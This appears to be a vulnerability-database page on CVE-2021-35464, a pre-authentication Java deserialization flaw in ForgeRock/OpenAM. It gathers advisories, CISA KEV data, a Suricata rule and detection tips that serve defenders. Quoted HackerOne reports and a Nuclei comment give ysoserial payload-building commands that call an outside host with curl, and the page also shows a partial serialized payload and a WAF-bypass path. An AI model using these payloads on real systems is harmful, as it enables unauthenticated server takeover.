CVE-2021-35464
published 2021-07-22CVE-2021-35464: ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require…
PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2021-11-17
Exploited in the wild
EPSS
100.00%
100.0th percentile
ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| forgerock | access_management | < 6.5.4 | 6.5.4 |
| forgerock | openam | >= 9.0.0 < 14.6.3 | 14.6.3 |
| openidentityplatform | openam | < 16.0.6 | 16.0.6 |
| openidentityplatform | openam | < 16.0.6 | 16.0.6 |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cA...
- →Detect WAF-bypass exploitation attempts using the path traversal variant 'oauth2/..;/ccversion/Version' in HTTP request logs. ↗
- →Flag any unauthenticated GET or POST requests containing a serialized Java object in the jato.pageSession parameter targeting ForgeRock AM endpoints. ↗
- →Exploitation does not require authentication; any single crafted request to /ccversion/* from an unauthenticated source should be treated as a high-priority alert. ↗
- →Use Qualys QID 150623 and QID 730675 to detect vulnerable ForgeRock Access Management instances in your environment. ↗
- →Note that CVE-2026-33439 is a bypass of the CVE-2021-35464 mitigation (WhitelistObjectInputStream on jato.pageSession) via the jato.clientSession parameter; monitor both parameters for serialized Java objects. ↗
- ·The WAF-bypass endpoint variant 'oauth2/..;/ccversion/Version' can circumvent perimeter controls blocking the canonical '/ccversion/Version' path; blocking only the canonical path is insufficient. ↗
- ·The vulnerability only affects ForgeRock AM versions 6.0.0.x and all 6.5 versions up to 6.5.3 running on Java 8 or earlier; AM 7.0+ is not affected. ↗
- ·The WhitelistObjectInputStream fix applied to jato.pageSession after CVE-2021-35464 does not protect the jato.clientSession parameter (CVE-2026-33439); patching CVE-2021-35464 alone may leave residual deserialization exposure. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
ghsa9.8CRITICAL
osv9.8CRITICAL
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
OpenIdentityPlatform OpenAM: Pre-Authentication Remote Code Execution via `jato.clientSession` Deserialization in OpenAM
ghsa·2026-04-07·CVSS 9.8
CVE-2026-33439 [CRITICAL] CWE-502 OpenIdentityPlatform OpenAM: Pre-Authentication Remote Code Execution via `jato.clientSession` Deserialization in OpenAM
OpenIdentityPlatform OpenAM: Pre-Authentication Remote Code Execution via `jato.clientSession` Deserialization in OpenAM
## Summary
OpenIdentityPlatform OpenAM 16.0.5 (and likely earlier versions) is vulnerable to pre-authentication Remote Code Execution (RCE) via unsafe Java deserialization of the `jato.clientSession` HTTP parameter. This bypasses the `WhitelistObjectInputStream` mitigation that was applied to the `jato.pageSession` parameter after CVE-2021-35464.
An unauthenticated attacker can achieve arbitrary command execution on the server by sending a crafted serialized Java object as the `jato.clientSession` GET/POST parameter to any JATO ViewBean endpoint whose JSP contains `` tags (e.g., the Password Reset pages).
---
## Vulnerability Details
### Background
CVE-2021-35464
OSV
OpenIdentityPlatform OpenAM: Pre-Authentication Remote Code Execution via `jato.clientSession` Deserialization in OpenAM
osv·2026-04-07·CVSS 9.8
CVE-2026-33439 [CRITICAL] OpenIdentityPlatform OpenAM: Pre-Authentication Remote Code Execution via `jato.clientSession` Deserialization in OpenAM
OpenIdentityPlatform OpenAM: Pre-Authentication Remote Code Execution via `jato.clientSession` Deserialization in OpenAM
## Summary
OpenIdentityPlatform OpenAM 16.0.5 (and likely earlier versions) is vulnerable to pre-authentication Remote Code Execution (RCE) via unsafe Java deserialization of the `jato.clientSession` HTTP parameter. This bypasses the `WhitelistObjectInputStream` mitigation that was applied to the `jato.pageSession` parameter after CVE-2021-35464.
An unauthenticated attacker can achieve arbitrary command execution on the server by sending a crafted serialized Java object as the `jato.clientSession` GET/POST parameter to any JATO ViewBean endpoint whose JSP contains `` tags (e.g., the Password Reset pages).
---
## Vulnerability Details
### Background
CVE-2021-35464
GHSA
GHSA-6x75-vwp5-q242: ForgeRock AM server 6
ghsa_unreviewed·2022-05-24
CVE-2021-35464 [CRITICAL] CWE-502 GHSA-6x75-vwp5-q242: ForgeRock AM server 6
ForgeRock AM server 6.x before 7, and OpenAM 14.6.3, has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/Version request to the server. The vulnerability exists due to incorrect usage of Sun ONE Application Framework (JATO).
VulnCheck
ForgeRock Access Management (AM) Core Server Remote Code Execution Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-35464 [CRITICAL] CWE-502 ForgeRock Access Management (AM) Core Server Remote Code Execution Vulnerability
ForgeRock Access Management (AM) Core Server Remote Code Execution Vulnerability
ForgeRock Access Management (AM) Core Server allows an attacker who sends a specially crafted HTTP request to one of three endpoints (/ccversion/Version, /ccversion/Masthead, or /ccversion/ButtonFrame) to execute code in the context of the current user (unless ForgeRock AM is running as root user, which the vendor does not recommend).
Affected: ForgeRock Access Management (AM)
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://cisa.gov/news-events/alerts/2022/04/27/2021-top-routinely-exploited-vulnerabilities; https://cisa.gov/news-events/cybersecu
CISA
ForgeRock Access Management (AM) Core Server Remote Code Execution Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2021-35464 [CRITICAL] CWE-502 ForgeRock Access Management (AM) Core Server Remote Code Execution Vulnerability
Vulnerability: ForgeRock Access Management (AM) Core Server Remote Code Execution Vulnerability
Affected: ForgeRock Access Management (AM)
ForgeRock Access Management (AM) Core Server allows an attacker who sends a specially crafted HTTP request to one of three endpoints (/ccversion/Version, /ccversion/Masthead, or /ccversion/ButtonFrame) to execute code in the context of the current user (unless ForgeRock AM is running as root user, which the vendor does not recommend).
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-35464
Remediation Due Date: 2021-11-17
Suricata
ET EXPLOIT ForgeRock Access Manager RCE (CVE-2021-35464)
suricata·2021-06-30·CVSS 9.8
CVE-2021-35464 [CRITICAL] ET EXPLOIT ForgeRock Access Manager RCE (CVE-2021-35464)
ET EXPLOIT ForgeRock Access Manager RCE (CVE-2021-35464)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT ForgeRock Access Manager RCE (CVE-2021-35464)"; flow:established,to_server; http.uri; content:"/openam/oauth2/"; content:"/ccversion/Version"; nocase; content:"jato.pageSession="; reference:url,portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464; classtype:attempted-admin; sid:2033208; rev:2; metadata:created_at 2021_06_30, cve CVE_2021_35464, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_04_05;)
Exploit-DB
ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)
exploitdb·2021-07-16·CVSS 9.8
CVE-2021-35464 [CRITICAL] ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)
ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)
---
# Exploit Title: ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2021-07-14
# Exploit Author: Photubias – tijl[dot]deneut[at]Howest[dot]be for www.ic4.be
# Vendor Advisory: [1] https://backstage.forgerock.com/knowledge/kb/article/a47894244
# Vendor Homepage: https://github.com/OpenIdentityPlatform/OpenAM/
# Version: [1] OpenAM 14.6.3
# [2] Forgerock 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and is fixed as of version AM 7 released on June 29, 2021
# Tested on: OpenAM 14.6.3 and Tomcat/8.5.68 with JDK-8u292 on Debian 10
# CVE: CVE-2021-35464
#!/usr/bin/env python3
'''
Copyright 2021 Photubias(c)
This program is free software: you can redis
Metasploit
ForgeRock / OpenAM Jato Java Deserialization
metasploit
ForgeRock / OpenAM Jato Java Deserialization
ForgeRock / OpenAM Jato Java Deserialization
This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM's implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user. This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus is susceptible to the same issue.
Nuclei
ForgeRock OpenAM <7.0 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2021-35464 [CRITICAL] ForgeRock OpenAM <7.0 - Remote Code Execution
ForgeRock OpenAM
# java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '='
# digest: 490a00463044022052274f326d1c4a5c1904754df993b92448ae9274bdb0080fbf2ed5b469d65a1f02203635e8ca9e587fd35ebedbe48942e17f7efedc99f3c5375393f5694385cb2d41:922c64590222798bb761d5b6d8e72950
HackerOne
Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)
hackerone·2023-12-21·CVSS 9.8
CVE-2021-35464 [CRITICAL] Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)
Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)
RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM.
### Supporting Material/References
- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
## Impact
An unauthenticated, 3rd-party attacker or adversary can execute remote code
## System Host(s)
███
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2021-35464
## Steps to Reproduce
## Steps To Reproduce
Target domain: ████
First we need to build the payload:
1. Download this jar file
``wget https://github.com/Bin4xin/sweet-ysoserial/blob/master/target/ysoserial-0.0.6-SNAPSHOT-all.jar``
then
``java -jar ysoserial-master-SNAPSHOT.jar Click1 "curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net"
HackerOne
Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)
hackerone·2021-07-29·CVSS 9.8
CVE-2021-35464 [CRITICAL] Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)
Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)
RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM.
### Supporting Material/References
- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
## Impact
An unauthenticated, 3rd-party attacker or adversary can execute remote code
## System Host(s)
████
## Affected Product(s) and Version(s)
ForgeRock OpenAM
## CVE Numbers
CVE-2021-35464
## Steps to Reproduce
First we need to build the payload:
1. Download this jar file
``wget https://github.com/Bin4xin/sweet-ysoserial/blob/master/target/ysoserial-0.0.6-SNAPSHOT-all.jar``
then
``java -jar ysoserial-master-SNAPSHOT.jar Click1 "curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net" | (echo -ne \\x00 && cat) |
HackerOne
Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)
hackerone·2021-07-29·CVSS 9.8
CVE-2021-35464 [CRITICAL] Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)
Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)
RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM.
## Impact
An unauthenticated, 3rd-party attacker or adversary can execute remote code
### Supporting Material/References
- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
## System Host(s)
█████
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2021-35464
## Steps to Reproduce
## Steps To Reproduce
Target domain: █████
First we need to build the payload:
1. Download this jar file
``wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar``
then
``java -jar ysoserial-master-SNAPSHOT.jar Click1 "curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net"
Qualys
Understanding the Impact of Scattered Spider on the Airline & Transportation Industry
blogs_qualys·2025-07-21·CVSS 7.8
[HIGH] Understanding the Impact of Scattered Spider on the Airline & Transportation Industry
## Table of Contents
What is Scattered Spider?
Airline Industry Asset Risks:
Insights from the Threat Research Unit and Key Findings:
Key Impacts and Recommendations:
Measure, Communicate, and Eliminate Your Risk from Scattered Spider with Qualys
In June, the FBI publicly warned that Scattered Spider is actively targeting the aviation and transportation sectors, including well-known airlines and their third-party IT vendors. In this post, we will provide a brief overview of Scattered Spider, insights gathered by our research team into the vulnerabilities they target, and how organizations can protect themselves.
## What is Scattered Spider?
Scattered Spider is a financially motivated hacking collective (also known as UNC3944, Octo Tempest, Scatter Swine, and Star Fraud), mostly com
Qualys
Understanding the Impact of Scattered Spider on the Airline & Transportation Industry | Qualys
blogs_qualys·2025-07-21·CVSS 7.8
[HIGH] Understanding the Impact of Scattered Spider on the Airline & Transportation Industry | Qualys
#### Table of Contents
- What is Scattered Spider?
- Airline Industry Asset Risks:
- Insights from the Threat Research Unit and Key Findings:
- Key Impacts and Recommendations:
- Measure, Communicate, and Eliminate Your Risk from Scattered Spider with Qualys
In June, the FBI publicly warned that Scattered Spider is actively targeting the aviation and transportation sectors, including well-known airlines and their third-party IT vendors. In this post, we will provide a brief overview of Scattered Spider, insights gathered by our research team into the vulnerabilities they target, and how organizations can protect themselves.
## What is Scattered Spider?
Scattered Spider is a financially motivated hacking collective (also known as UNC3944, Octo Tempest, Scatter Swine, and Star Fraud), mo
Unit42
Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
blogs_unit42·2022-07-21·CVSS 9.8
CVE-2017-5638 [CRITICAL] Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
Threat Research Center
Trend Reports
Vulnerabilities
## Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
Unit 42
Published: July 21, 2022
Trend Reports
Vulnerabilities
Apache Log4j
CVE-2017-5638
CVE-2017-9841
CVE-2018-19986
CVE-2019-02320
CVE-2019-19597
CVE-2019-9082
CVE-2020-14882
CVE-2020-14883
CVE-2020-15505
CVE-2020-15506
CVE-2020-25078
CVE-2020-5902
CVE-2021-21315
CVE-2021-22986
CVE-2021-26855
CVE-2021-31805
CVE-2021-34473
CVE-2021-35464
CVE-2021-38647
CVE-2021-40438
CVE-2021-40539
CVE-2021-41773
CVE-2021-42013
CVE-2021-44228
CVE-2021-45046
CVE-2022-22963
CVE-2022-22965
Network security trends
Unit 42 Network Threat Trends Research Report
## Executive Summary
Tens of thousands of vulnerabilities are repo
Unit42
Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
blogs_unit42·2022-07-21·CVSS 9.8
[CRITICAL] Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
## Executive Summary
Tens of thousands of vulnerabilities are reported every year, but not all are used by threat actors in real-world attacks. There are many reasons for this: a proof of concept (PoC) may not be available for attackers to weaponize, it may be too difficult to exploit the vulnerability, there may be a lack of accessible vulnerable software on the internet, or attackers may simply deem a vulnerability not worth exploiting due to low impact. Real-world defenders need real-world data on which vulnerabilities attackers are choosing to exploit – and where to focus protections.
In the 2022 Unit 42 Network Threat Trends Research Report, we’ve used data captured by the Palo Alto Networks Advanced Threat Prevention security service on Next-Generation Firewall and Prisma SASE from
Unit42
Network Security Trends: May-July 2021
blogs_unit42·2021-09-17
Network Security Trends: May-July 2021
## Executive Summary
Unit 42 researchers continue to observe network security trends, tracking how cybercriminals take advantage of vulnerabilities in the real world. The following sections present our analysis of the most recently published vulnerabilities, including their severity and category distribution. Additionally, we provide insight into how the vulnerabilities are exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls. We highlight vulnerabilities ranked medium severity and above that were newly published from May-July 2021 in order to raise awareness of their active exploits in the wild. We then draw conclusions about the most commonly exploited vulnerabilities we observed attackers using, as well as the severity, category and
Unit42
Network Security Trends: May-July 2021
blogs_unit42·2021-09-17
Network Security Trends: May-July 2021
Threat Research Center
Trend Reports
Vulnerabilities
## Network Security Trends: May-July 2021
Yue Guan
Lei Xu
Published: September 17, 2021
Malware
Trend Reports
Vulnerabilities
Attack analysis
Exploit
Exploit in the wild
Network security trends
## Executive Summary
Unit 42 researchers continue to observe network security trends, tracking how cybercriminals take advantage of vulnerabilities in the real world. The following sections present our analysis of the most recently published vulnerabilities, including their severity and category distribution. Additionally, we provide insight into how the vulnerabilities are exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls . We highlight vulnerabilities ranked medium sever
Crowdstrike
Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
Wiz
CVE-2026-33439 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-33439 [CRITICAL] CVE-2026-33439 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33439 :
Java vulnerability analysis and mitigation
Open Access Management (OpenAM) is an access management solution. Prior to 16.0.6, OpenIdentityPlatform OpenAM is vulnerable to pre-authentication Remote Code Execution (RCE) via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypasses the WhitelistObjectInputStream mitigation that was applied to the jato.pageSession parameter after CVE-2021-35464. An unauthenticated attacker can achieve arbitrary command execution on the server by sending a crafted serialized Java object as the jato.clientSession GET/POST parameter to any JATO ViewBean endpoint whose JSP contains jato:form tags (e.g., the Password Reset pages). This vulnerability is fixed in 16.0.6.
Source : NVD
## 9.3
Score
Published April 7
Greynoiseio
Malicious Tag Roundup (Jul 19-Aug 2, 2021)
blogs_greynoiseio·CVSS 10.0
[CRITICAL] Malicious Tag Roundup (Jul 19-Aug 2, 2021)
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.htmlhttp://packetstormsecurity.com/files/163525/ForgeRock-Access-Manager-OpenAM-14.6.3-Remote-Code-Execution.htmlhttps://backstage.forgerock.com/knowledge/kb/article/a47894244https://bugster.forgerock.orghttp://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.htmlhttp://packetstormsecurity.com/files/163525/ForgeRock-Access-Manager-OpenAM-14.6.3-Remote-Code-Execution.htmlhttps://backstage.forgerock.com/knowledge/kb/article/a47894244https://bugster.forgerock.orghttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-35464
2021-07-22
Published
2021-11-03
Added to CISA KEV
Exploited in the wild